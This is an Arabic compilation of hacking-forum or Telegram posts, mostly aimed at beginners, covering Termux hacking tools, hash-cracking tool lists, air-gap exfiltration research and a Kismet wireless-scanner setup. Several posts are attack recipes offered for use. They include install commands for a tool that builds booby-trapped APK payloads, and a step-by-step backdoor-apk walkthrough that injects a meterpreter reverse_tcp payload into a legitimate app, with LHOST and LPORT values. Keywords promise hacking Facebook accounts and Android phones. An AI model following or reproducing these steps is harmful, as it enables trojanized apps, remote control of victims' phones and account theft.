الحاجه التانية انك يكون عندك سيرفر خارجي ودا براهو ح يحتاج شرح كامل وانا ان شاء الله ح اشرح ليكم بس شوية وقت عشان عندنا مناسبة والله والشبكه كعبه برضو المهم اجتهدو في اداة ngrok لانها ساهلة وانا ح انزل الشرح بتاع الإختراق المساء ان شاء الله والشرح ح يكون بالاسكرين شوت عشان يقع ليكم


ح نجتهد في اداة ngrok 😎

ح ننتظرك لشرح السيرفر الخارجي 😉


كونو بخير
تثبيت أداة EasY_HaCk

تقدر تثبيت من خلالها
MetaSploit / BeEf / nmap بكل سهولة


(1) git clone https://github.com/sabri-zaki/EasY_HaCk
(2) cd EasY_HaCk
(3) chmod +x install.sh
(4) bash install.sh
(5) EasY_HaCk

اضغط 1 ( لصنع بايلود apk ملغم )
اضغط 2 ( لتثبيت MetaSploit )
اضغط 3 ( لتثبيت أداة BeEF )
اضغط 5 ( لتثبيت أداة nmap )


#لإعادة_تشغيل_الأداة_مرة_أخرى

EasY_HaCk

اختراق فيسبوك termux
اختراق اجهزة اندرويد termux
اختراق خارجي
اختراق خارجي metasploit
تثبيت termux بدون روت
تثبيت java على termux
اختراق المواقع termux
تثبيت ادوات termux
تثبيت metasploit
اختراق حسابات فيسبوك
اختراق حسابات فيسبوك termux
تثبيت termux على الأندرويد
اختراق اي جهاز اندرويد termux



💀 ||•Ƭєαм | Hαcкєя || 🚫

قناتنا على التليجرام
t.me/KALITERMX
أفضل أدوات فك Hash وكسرها سواءً كانت للمواقع أو الأجهزة أو الشبكات :
- John the Ripper 🔥
- Aircrack 🔥
- Hashcat 🎩
- RainbowCrack 🌈
- OphCrack
هناك الكثير ولكن تعتبر هذه هي الأفضل حالياً .. لكل أداة أسلوب في كسر وفك الهاش . كلها تستحق ⭐️⭐️⭐️⭐️⭐️
#HAQWI https://t.co/KxyIsVoHN8
أفضل أدوات فك Hash وكسرها سواءً كانت للمواقع أو الأجهزة أو الشبكات :
- John the Ripper 🔥
- Aircrack 🔥
- Hashcat 🎩
- RainbowCrack 🌈
- OphCrack
هناك الكثير ولكن تعتبر هذه هي الأفضل حالياً .. لكل أداة أسلوب في كسر وفك الهاش . كلها تستحق ⭐️⭐️⭐️⭐️⭐️
#HAQWI https://t.co/KxyIsVoHN8
كتاب اختبار الاختراق PWK الإحترافي :
محتوى الكتاب قوي ومفيد جداً يضم :
- أمن تطبيقات الويب
- أمن الشبكات
- البرمج ( Python- Perl )
- استغلال الثغرات
- فحص الأنظمة
- Password Attack
- Metasploit
- تخطي الحماية
- وغيرها الكثير والمفيد
⭐️ للتحميل :
https://t.co/hkLoHlZXgR
#HAQWI https://t.co/oe45d06OZI
اداة backdoor-apk لاصحاب termux اداة حقن التطبيقات

اوامر تثبيت الاداه


git clone https://github.com/dana-at-cp/backdoor-apk.git

cd backdoor-apk

cd backdoor-apk

backdoor-apk.sh BaiduBrowser.apk./

اسم التطبيق المراد حقنه(BaiduBrowser.apk)

بعدها يطلع لك نوع الباليود الي تريد تحقنه

meterpreter/reverse_tcp

مثلا اخترنا 3

ثم الهوست
Please enter an LHOST value: 10.6.9.31

ثم البورت
Please enter an LPORT value: 443


ثم يظهر لنا خياران وهو نوع الحاقن

[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffl

تختار براحتك 1 او 2

بعدها راح يبدا الحقن



اختراق فيسبوك termux
اختراق اجهزة اندرويد termux
اختراق خارجي
اختراق خارجي metasploit
تثبيت termux بدون روت
تثبيت java على termux
اختراق المواقع termux
تثبيت ادوات termux
تثبيت metasploit
اختراق حسابات فيسبوك
اختراق حسابات فيسبوك termux
تثبيت termux على الأندرويد
اختراق اي جهاز اندرويد termux



💀 ||•Ƭєαм | Hαcкєя || 🚫
*اٰلـہٰٖاٰيٰـہٰٖنٰـہٰٖمٰـہٰٖوٰسٰـہٰٖ اٰلـہٰٖسٰـہٰٖوٰرٰيٰـہٰٖ🔥‌‏❥ ابو اسلام:*
موضوع اليوم عن الاختراق وحيال جديده يستخدمه القرصنة 💜
.
.
.:كل هكرز سواء ان كان مبتداء ومحترف فو يعرف انه لايمكن اختراق اي جهاز حسوب وهو غير متصل بالانترنت لكن الاشي المخيف يمكن لي الهكرز الوصول لي حسوبك بكل سهوله وهو غير متصل بالانترنت ﻛﻞ ﺷﻲﺀ ﻓﻲ ﺍﻟﻮﺟﻮﺩ ﻟﻪ ﻧﻘﺎﻁ ﺿﻌﻒ ﻭﻧﻘﺎﻁ ﻗﻮﺓ. ﺍﻟﺘﻜﻨﻮﻟﻮﺟﻴﺎ ﻛﺬﻟﻚ
ﺩﺍﺋﻤﺎ ﺭﻏﻢ ﻣﺎ ﺗﺘﻮﻓﺮ ﻋﻠﻴﻪ ﻣﻦ ﻣﻤﻴﺰﺍﺕ ﻭﻧﻘﺎﻁ ﻗﻮﺓ . ﺃﻳﻀﺎ ﻣﻦ ﺍﻟﻤﻔﺘﺮﺽ ﺃﻥ
ﺃﻱ ﺷﺨﺺ ﺗﻘﻨﻲ ﻟﻪ ﺩﺭﺍﻳﺔ ﺑﺎﻟﻤﺠﺎﻝ ﻳﻌﻠﻢ ﺃﻥ ﺃﻱ ﺷﻲﺀ ﻣﻮﺻﻮﻝ ﺑﺎﻻﻧﺘﺮﻧﺖ
ﻣﻌﺮﺽ ﻟﺨﻄﺮ ﺍﻻﺧﺘﺮﺍﻕ ﺃﻭ ﻋﻠﻰ ﺍﻷﻗﻞ ﻟﻤﺨﺎﻃﺮ ﺃﻣﻨﻴﺔ، ﻟﻜﻦ ﻫﻞ ﺻﺤﻴﺢ ﺃﻥ
ﻛﻞ ﺟﻬﺎﺯ ﻏﻴﺮ ﻣﺘﺼﻞ ﺑﺎﻻﻧﺘﺮﻧﺖ ﻻ ﻳﻤﻜﻦ ﺍﺧﺘﺮﺍﻗﻪ؟
ﻓﻲ ﻣﺠﺎﻝ ﺃﻣﻦ ﺍﻟﻤﻌﻠﻮﻣﺎﺕ ﻫﻨﺎﻙ ﻣﺼﻄﻠﺢ ﺍﺳﻤﻪ Air-gapped
Computers ، ﻭﻫﻲ ﺃﺟﻬﺰﺓ ﺍﻟﻜﻤﺒﻴﻮﺗﺮ ﺍﻟﻤﻌﺰﻭﻟﺔ ﺑﺸﻜﻞ ﺗﺎﻡ ﻋﻦ ﺃﻱ ﺍﺗﺼﺎﻻﺕ
ﺧﺎﺭﺟﻴﺔ ﺃﻭ ﺣﺘﻰ ﻣﻌﺰﻭﻟﺔ ﻋﻦ ﺃﺟﻬﺰﺓ ﺑﺠﺎﻧﺒﻬﺎ ﻳﻤﻜﻦ ﺃﻥ ﺗﻜﻮﻥ ﻣﺘﺼﻠﺔ ﺑﺄﻱ
ﺷﺒﻜﺔ ﻣﻦ ﺍﻟﺸﺒﻜﺎﺕ ﺃﻭ ﺗﺴﺘﺨﺪﻡ ﺃﻱ ﻧﻮﻉ ﻣﻦ ﺍﻻﺗﺼﺎﻻﺕ ﺍﻟﺴﻠﻜﻴﺔ ﺃﻭ
ﺍﻟﻼﺳﻠﻜﻴﺔ . ﻭﺗﺴﺘﺨﺪﻡ ﺃﺟﻬﺰﺓ ﻣﻦ ﻫﺬﺍ ﺍﻟﻨﻮﻉ ﻓﻲ ﺍﻟﻤﺠﺎﻝ ﺍﻟﻌﺴﻜﺮﻱ ﺫﻱ
ﺍﻟﺤﺴﺎﺳﻴﺔ ﻭﺍﻟﺴﺮﻳﺔ ﺍﻟﻌﺎﻟﻴﺔ ﻭﺍﻟﻤﺠﺎﻝ ﺍﻟﺒﻨﻜﻲ ﻭﺣﺘﻰ ﺍﻟﺼﺤﻔﻲ ﺃﺣﻴﺎﻧﺎ .
ﻟﺬﺍ ﺇﺫﺍ ﻛﻨﺖ ﻣﻘﺘﻨﻌًﺎ ﺃﻥ ﻫﺬﻩ ﺍﻟـﺠﻬﺰﺓ ﺍﻟﻤﺤﻤﻴﺔ ﺑﻬﺬﺍ ﺍﻟﺸﻜﻞ ﻻ ﻳﺴﺘﻄﻴﻊ ﺃﺣﺪ
ﻳﺨﺘﺮﻗﻬﺎ ﻓﺄﻧﺖ ﺧﺎﻃﺊ ﻛﻠﻴﺎ !
ﻓﻲ ﻏﺸﺖ ﺳﻨﺔ 2014 ، ﺍﻛﺘﺸﻒ ﺑﺎﺣﺜﺎﻥ ﺃﻣﻨﻴﺎﻥ ﻣﻦ ﺟﺎﻣﻌﺔ ﺑﻦ ﻏﻮﺭﻳﻮﻥ
ﺍﻹمركيه ﺗﻘﻨﻴﺔ ﺇﺳﺘﻄﺎﻋﺎ ﻣﻦ ﺧﻼﻟﻬﺎ ﺇﺛﺒﺎﺕ ﺃﻥ ﻋﺰﻝ ﺟﻬﺎﺯ ﺍﻟﻜﻤﺒﻴﻮﺗﺮ ﺑﺸﻜﻞ
ﺗﺎﻡ ﻋﻦ ﺃﻱ ﺍﺗﺼﺎﻻﺕ ﺧﺎﺭﺟﻴﺔ ﻻ ﻳﻤﻨﻊ ﺍﻟﺘﺠﺴﺲ ﻋﻠﻴﻪ . ﻫﺬﻩ ﺍﻟﺘﻘﻨﻴﺔ ﻫﻲ Air
Hopper ، ﻭﻗﺪ ﻗﺎﻣﻮﺍ ﺑﺘﻘﺪﻣﻴﻬﺎ ﻓﻲ ﻧﺴﺨﺔ ﺍﻟﺴﻨﺔ ﺍﻟﺘﺎﺳﻌﺔ ﻣﻦ ﻣﺆﺗﻤﺮ ﻧﻈﻤﺘﻪ
ﺟﺎﻣﻌﺘﻬﻢ . ﻟﻜﻦ ﻛﻴﻒ ﺗﻢ ﺫﻟﻚ ؟
ﻫﺬﻩ ﺍﻟﺘﻘﻨﻴﺔ ﺍﻟﺘﻲ ﺗﻮﺻﻞ ﻟﻬﺎ ﺍﻟﺒﺎﺣﺜﺎﻥ ﺗﺘﻴﺢ ﺗﺴﺮﻳﺐ ﺍﻟﺒﻴﺎﻧﺎﺕ ﻭﺍﻟﺘﺠﺴﺲ
ﻋﻠﻰ ﻣﻌﻠﻮﻣﺎﺕ ﺍﻟﺘﻲ ﻳﻘﻮﻡ ﺍﻟﺤﺎﺳﻮﺏ ﺑﻤﻌﺎﻟﺠﺘﻬﺎ ﻣﻦ ﺧﻼﻝ ﺇﺷﺎﺭﺍﺕ ﺍﻟﺮﺍﺩﻳﻮ
ﻭﺍﻻﻧﺒﻌﺎﺛﺎﺕ ﺍﻟﺘﻲ ﺗﻘﻮﻡ ﺍﻷﺟﻬﺰﺓ ﺍﻟﺤﺮﺍﺭﻳﺔ ﺩﺍﺧﻞ ﺍﻟﻜﻤﺒﻴﻮﺗﺮ ﺑﺒﺜﻬﺎ ! ﺍﻟﻤﻮﺿﻮﻉ
ﻏﺮﻳﺐ ﻧﻮﻋﺎ ﻣﺎ ﻟﺪﺭﺟﺔ ﺃﻥ ﺍﻷﻏﻠﺒﻴﺔ ﻟﻢ ﺗﺼﺪﻕ ﻫﺬﺍ ﺍﻻﻛﺘﺸﺎﻑ ! ﻓﺘﻄﺒﻴﻖ Air
Hopper ﻫﻮ ﺗﻄﺒﻴﻖ ﻣﻮﺑﺎﻳﻞ ﺗﻢ ﺗﺼﻤﻴﻤﻪ ﻣﻦ ﻗﺒﻞ ﺍﻟﺒﺎﺣﺜﻴﻦ ﺍﻻﻣﻨﻴﻴﻦ ﻟﻠﻘﻴﺎﻡ
ﺑﺎﻟﺘﺠﺴﺲ ﻋﻠﻰ ﺿﺮﺑﺎﺕ ﺍﻟﻤﻔﺎﺗﻴﺢ Key Logging ﺍﻟﺘﻲ ﻳﻘﻮﻡ ﺑﻬﺎ ﺍﻟﻜﻤﺒﻴﻮﺗﺮ
ﺍﻟﻤﻮﺟﻮﺩ ﻓﻰ ﻫﺬﻩ ﺍﻟﺒﻴﺌﺔ ﺍﻟﻤﻌﺰﻭﻟﺔ .
ﻭﻗﺪ ﻗﺎﻡ ﺍﻟﺒﺎﺣﺜﺎﻥ ﺍﻷﻣﻨﻴﺎﻥ ﺑﺘﺠﺮﺑﺔ ﻓﺮﻳﺪﺓ، ﻓﻘﺪ ﺗﺄﻛﺪﺍ ﺃﻭﻻ ﺃﻥ ﺍﻟﻜﻤﺒﻴﻮﺗﺮ ﻏﻴﺮ
ﻣﻮﺻﻞ ﺑﺄﻱ ﻭﺳﻴﻠﺔ ﻣﻦ ﻭﺳﺎﺋﻞ ﺍﻻﺗﺼﺎﻻﺕ، ﻧﻔﺲ ﺍﻟﺸﻲﺀ ﻟﻠﻬﺎﺗﻒ . ﺑﻌﺪﻫﺎ ﻗﺎﻣﻮﺍ
ﺑﺘﻨﺼﻴﺐ ﺗﻄﺒﻴﻖ ﻋﻠﻰ ﺍﻟﻬﺎﺗﻒ ﻣﺴﺘﻘﺒﻞ ﺍﻟﺮﺍﺩﻳﻮ ﻋﻠﻰ ﺍﻟﻬﺎﺗﻒ . ﺷﺎﻫﺪﻭﺍ ﺍﻟﺘﺠﺮﺑﺔ
ﻣﻦ ﺧﻼﻝ ﻫﺬﺍ ﺍﻟﻔﻴﺪﻳﻮ .https://m.youtube.com/results?q=How%20to%20hack%20a%20computer%20that%20is%20not%20connected%20to%20the%20Internet&sm=3
ﺑﻌﺪ ﺗﻄﺒﻴﻖ Air Hopper ، ﻗﺎﻡ ﻧﻔﺲ ﺍﻟﺒﺎﺣﺜﺎﻥ ﺍﻷﻣﻨﻴﺎﻥ ﺑﺎﻛﺘﺸﺎﻑ ﺗﻘﻨﻴﺔ
ﺛﺎﻧﻴﺔ ﺍﺳﻤﻬﺎ BitWhisper ، ﻟﻜﻦ ﺍﻷﻣﺮ ﺍﻟﻤﻐﺎﻳﺮ ﻓﻴﻬﺎ ﺃﻧﻬﻤﺎ ﺍﺳﺘﻄﺎﻋﺎ ﺍﺧﺘﺮﺍﻕ
ﺍﻟﻜﻤﺒﻴﻮﺗﺮ ﺍﻟﻤﻮﺟﻮﺩ ﻓﻲ ﺍﻟﺒﻴﺌﺔ ﺍﻟﻤﻨﻌﺰﻟﺔ ﻣﻦ ﺧﻼﻝ ﻗﻴﺎﺱ ﺍﻻﻧﺒﻌﺎﺛﺎﺕ ﺍﻟﺤﺮﺍﺭﻳﺔ
ﺍﻟﺘﻲ ﻳﻘﻮﻡ ﺍﻟـ CPU ﺑﺒﺜﻬﺎ ﻓﻲ ﻟﺤﻈﺔ ﻗﻴﺎﻡ ﺍﻟﻤﻌﺎﻟﺞ ﺑﻌﻤﻠﻴﺎﺕ ﻣﻌﻘﺪﺓ ﺟﺪﺍ !
ﻓﻲ ﺍﻟﺘﺠﺮﺑﺔ ﺍﻟﺴﺎﺑﻘﺔ ﺍﺳﺘﻄﺎﻋﺎ ﺳﺮﻗﺔ ﺿﺮﺑﺎﺕ ﻟﻮﺣﺔ ﺍﻟﻤﻔﺘﺎﻳﺢ، ﺑﻴﻨﻤﺎ ﻓﻲ ﻫﺬﻩ
ﺍﻟﻤﺮﺓ ﺍﺧﺘﺮﻓﺎ ﺍﻻﺗﺼﺎﻝ ﺍﻟﻤﻮﺟﻮﺩ ﺑﻴﻦ ﺍﻟﺠﻬﺎﺯﻳﻦ ﺍﻟﻤﻮﺟﻮﺩﻳﻦ ﻓﻲ ﺑﻴﺌﺔ ﻣﻨﻌﺰﻟﺔ
ﺗﻤﺎﻣﺎ . ﻫﺎ ﻫﻮ ﻓﻴﺪﻳﻮ ﺍﻟﺘﺠﺮﺑﺔ، ﻭﻫﺬﻩ ﻣﻌﻠﻮﻣﺎﺕ ﻣﻬﻤﺔ ﻋﻦ ﺍﻟﺘﻘﻨﻴﺔ ﺍﻟﺜﺎﻧﻴﺔ .
ﻟﻜﻦ ﺍﻟﻤﺸﻜﻠﺔ ﺍﻷﻛﺒﺮ ﻓﻲ ﺍﻟﻮﺍﻗﻊ ﻟﻴﺴﺖ ﻓﻲ ﺍﺧﺘﺮﺍﻕ ﺍﻟﺤﻮﺍﺳﻴﺐ ﻷﻥ ﺍﻷﺛﺮ
ﺍﻟﺨﺎﺹ ﺑﺎﻟﻬﺠﻮﻡ ﻟﻴﺲ ﺑﺎﻟﺸﻜﻞ ﺍﻟﻘﻮﻱ ، ﻟﻜﻦ ﺍﻷﻣﺮ ﺍﻟﺨﻄﻴﺮ ﻫﻮ ﺍﻟﻘﻠﻖ ﻣﻦ
ﺍﺳﺘﺨﺪﺍﻡ ﻫﺬﺍ ﺍﻟﻬﺠﻮﻡ ﻋﻠﻰ ﺍﻧﺘﺮﻧﺖ ﺍﻷﺷﻴﺎﺀ . ﻛﻤﺎ ﺃﻥ ﺍﻷﻣﺮ ﻟﻢ ﻳﻘﻒ ﻋﻨﺪ ﻫﺬﺍ
ﺍﻟﺤﺪ، ﻓﻘﺪ ﺍﻛﺘﺸﻒ ﺍﻟﺒﺎﺣﺜﺎﻥ ﺗﻘﻨﻴﺔ ﺗﻘﻨﻴﺔ ﺗﺴﻤﻰ Fansmitter ، ﻭﻫﻲ ﺗﻘﻨﻴﺔ
ﺗﻘﻮﻡ ﺑﺎﻟﺘﺼﻨﺖ ﻋﻠﻰ ﺍﻟﺒﻴﺎﻧﺎﺕ ﺍﻟﻤﺴﺮﺑﺔ ﻣﻦ ﺍﻟﻜﻤﺒﻴﻮﺗﺮﺍﺕ ﺍﻟﻤﻌﺰﻭﻟﺔ ﻣﻦ ﺧﻼﻝ
ﺍﻟﻤﺮﺍﻭﺡ ﺍﻟﻤﻮﺟﻮﺩﺓ ﺩﺍﺧﻞ ﺍﻷﺟﻬﺰﺓ ﻭﻋﻦ ﻃﺮﻳﻖ ﺳﻤﺎﻋﻬﺎ ﺑﺎﻟﻤﻴﻜﺮﻭﻓﻮﻥ ﺍﻟﺨﺎﺹ
ﺑﺎﻟﻬﺎﺗﻒ ﺍﻟﻤﺤﻤﻮﻝ .
ﻫﺬﻩ ﺍﻟﺒﻴﺎﻧﺎﺕ ﺍﻟﻤﺴﺮﺑﺔ ﻗﺪ ﺗﻜﻮﻥ ﻛﻠﻤﺎﺕ ﻣﺮﻭﺭ ﺃﻭ ﻣﻔﺎﺗﻴﺢ ﺗﺸﻔﻴﺮ، ﻭﻗﺪ
ﺍﺳﺘﻄﺎﻋﺎ ﺗﺤﻠﻴﻞ ﺍﻟﺘﺮﺩﺩ ﻭﺍﻟﻘﻮﺓ ﺍﻟﺨﺎﺻﺔ ﺑﺎﻟﻀﺠﻴﺞ ﺍﻟﺼﻮﺗﻲ ﺍﻟﺼﺎﺩﺭ ﻣﻦ
ﺍﻟﻤﺮﺍﻭﺡ ﺑﺎﻻﻋﺘﻤﺎﺩ ﻋﻠﻰ ﻭﺣﺪﺓ ﻗﻴﺎﺱ ﺗﺮﺩﺩ ﺍﻟﻤﺮﺍﻭﺡ Revolutions Per
Minute ﺃﻭ ﻛﻮﺩ ﺑﺮﻣﺠﻲ ﻃﻮّﺭﺍﻩ . ﻭﻫﺬﺍ ﻣﻠﺨﺺ ﺍﻟﺒﺤﺚ ﺍﻟﺨﺎﺹ
ﺑـ Fansmitter .
ﺃﺧﻴﺮﺍ ﻫﻞ ﺃﻧﺖ ﻣﻘﺘﻨﻊ ﺃﻧﻚ ﻣﺤﻤﻲ ﻣﻦ ﺧﻄﺮ ﺍﻟﺘﺠﺴﺲ ﻭﺍﻻﺧﺘﺮﺍﻕ؟ ﻓﻜﺮ ﻣﻦ
ﺟﺪﻳﺪ
اٰلـہٰٖاٰيٰـہٰٖنٰـہٰٖمٰـہٰٖوٰسٰـہٰٖ اٰلـہٰٖسٰـہٰٖوٰرٰيٰـہٰٖ🔥‌‏❥ ابو اسلام:
بسم الله الرحمن الرحيم




سؤال يطرحه المبتدئين في تعلم أساليب الهكر و الحماية

أو الذين يريدون أن يتعلموا السيكيوريتي أو الاختراق .

ما هي الثغرات ؟؟

يمكننا القول الثغرة هي عبارة عن نقطة ضعف تمكن الهاكر من الاختراق .

و هذا الضعف قد يكون خطا برمجي مثلا يمكن استغلاله من قبل الهكر

بحيث يعطي أوامر للجهاز الهدف و ذلك الجهاز يقوم بتنفيذها مما يمكن الهاكر من

الاختراق الفعلي لجهاز الحاسوب .

لا يمكن معرفة عدد الثغرات الموجودة لان عالم الانترنت مليء بالثغرات

و هذه الثغرات قد تكون موجودة في أنظمة التشغيل مثلا ويندوز

أو قد تكون موجودة في أحد البرامج مثلا مشغل مقاطع الفيديو أو ما شابهه ذلك و قد

تكون موجودة في تطبيقات الانترنت مثلا صفحات ال

Php

أو قد تكون موجودة في أي شيء له علاقة بالتكنولوجيا و البرمجة و ما إلا ذلك يعني

قد تكون ايضا هذه الثغرة موجودة في نظام الطائرة أو في نظام المفاعل النووي أو

نظام السيارة و وجود ثغرات في مثل هذه الأنظمة الكبيرة قد يسبب مشاكل ضخمة لا

يمكن توقع نتائجها .

لتتمكن من دراسة الثغرات عليك أن تتعرف على أنواع الثغرات التي سوف أذكرها لك :

Sql Injection

Buffer Over Flow

File Include

XSS

و كل نوع من هذه الأنواع ينقسم إلى أكثر من قسم .

طبعا هذه ليست كل الأنواع بل هنالك أمور أخرى قد تصنف على أنها ثغرات أو نقاط

ضعف .

سؤال أخر قد يسأله بعض المبتدئين و هو :

ماذا يجب أن أعرف حتى أبدأ بتعلم الثغرات ؟؟

أولا أقول له كيف تبحث عن ثغرة في نظام لينكس و أنت أصلا لا تستخدم هذا النظام و

لا تعرفه . إذن يجب عليك التعامل و استخدام الأنظمة التي تبحث فيها عن ثغرات أو

تريد استغلال ثغرات موجودة فيها أصلا .

و ثانيا : أقول له كيف أصلا سوف تبحث عن مشاكل و أخطاء برمجية في أحد البرامج

أو التطبيقات و أنت أصلا لا تعرف في البرمجة . إذن يجب تعلم البرمجة .

ما هي لغات البرمجة التي يجب أن تتعلمها :

حقيقة أنا لا أحب أن أقول لك تعلم لغة كذا و كذا . فأنت حر في ما تريد أن تتعلم و ذلك

حسب طموحك فإذا أردت أن تبحث و تكتشف ثغرات في تطبيقات ال

Php

فعليك أن تتعلمها و كذلك الأمور الأخرى .

ولكن يمكنني بشكل عام أن أقول لك أنه كل ما كنت تعرف لغات برمجة أكثر كلما كنت

قادرا على اكتشاف الثغرات أكثر يمكنك أن تبدأ في لغة

Php

و بعد ذلك إلى باقي اللغات .

و لا تتوقف عند حد معين و لكن أخي تذكر أن لا تبدأ بالغات الصعبة من البداية ,

أنصحك أن تبدأ بالغات السهلة مثل :

Php, asp

و بعد ذلك يمكنك تعلم لغات :

C,C++, Assembly

هذا في ما يخص اكتشاف الثغرات و التحليل للبرامج و الأنظمة .

أما لتعلم الهكر بشكل عام فأنصحك بتعلم لغات

Python

ruby

Perl

وبعد ذلك باقي اللغات

و يجب أن تعرف أن المبرمج القوي هو الهاكر القوي و الحقيقي و غير ذلك هم مجرد

مقلدين للهكر الحقيقيين .

نلقاكم في درس قادم أن شاء الله
انهارده في ناس كتيره هتستغرب وهتسمع عن الشرح واول مره يسمعوا ويعرفوا الاداه دي او البرنامج ده

والشرح ده مقدم من 👇🏻


النقيب /محمود




Kismet

عباره عن برنامج wireless scanner يقوم بإظهار معلومات كثيره جدا عن الشبكات التي يكتشفها
يظهر اذا كانت هناك شبكة حتى ولو كانت الاشاره الصادره من الشبكه ضعيفه جدااا , وحتى ولو كان صاحب الشبكه قد الغى SSID BroadCasting , يقوم برنامج Kismet بإظهار الشبكه والماك ادرس للراوتر ولكن بدون ال SSID لها , يمكن اظهاره عن طريق برنامج Aircrack الذي سوف نتحدث عنه لاحقا .
Kismet يعطيك معلومات عن الايبيات المستخدمه في الشبكه وعن نوع التشفير المستخدم واذا كانت الشبكه فيها ثغره تمكنك من اختراقها , وغيرها الكثير من الاشياء , بالاضافه الى انه يظهر صوت اذا اكتشف شبكة واذا كان مايزال متصل بها .


ثبت البرنامج :
./configure
make
male install

البرانامج لا يشغل من خلال المستخدم root يجب ان تحدد مستخدم خاص او معين لتشغيل البرنامج . مثلا انا حددت المستخدم drdeath لتشغيل البرنامج .
قم بالتعديل على ملف kismet.conf
vi /usr/local/etc/kismet.conf
وعدل على الاختيارات التاليه :
# User to setid to (should be your normal user)
suiduser=drdeath

# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=orinoco,eth1,Kismet

ضع المستخدم الي تريده في خانت suiduser
وضع اسم كرت النتورك الي تستخدمه في خانت source
اضف البيانات نفسها : orinoco,eth1,Kismet

افتح نافذه جديده للدخول بمستخدم اخر , اضغط Alt+Ctrl+F2
اكتب اسم العضو والباسورد , وبعدها اكتب su , للحصول على صلاحيات الرووت لتشغيل البرنامج .
وخلاص شغل البرنامج بالامر kismet
البرنامج سوف يقوم بعرض جميع النتورك الموجوده , ويمكنك ان ترى بيانات الشبكات عن طريق الضغط على الزر s
وبعدها اختار اي mode تريد , مثلا ESSID , اضغط s
وبعدها سوف تستطيع التحرك واختيار الشبكات , عن طريق الضغط على الزر i لاختيار الشبكه المراد الاطلاع على بياناتها .

هناك خيارت كثيره جدا , وامور كثير يستطيع البرنامج القيام بها , اكتب الامر h , لروئية مايستطيع البرنامج فعله .

طريقه اعداد البرنامج :
www.securityforest.com/wiki/i..._and_configure
================================


الرجاء عدم حذف المصدر

®النقيب®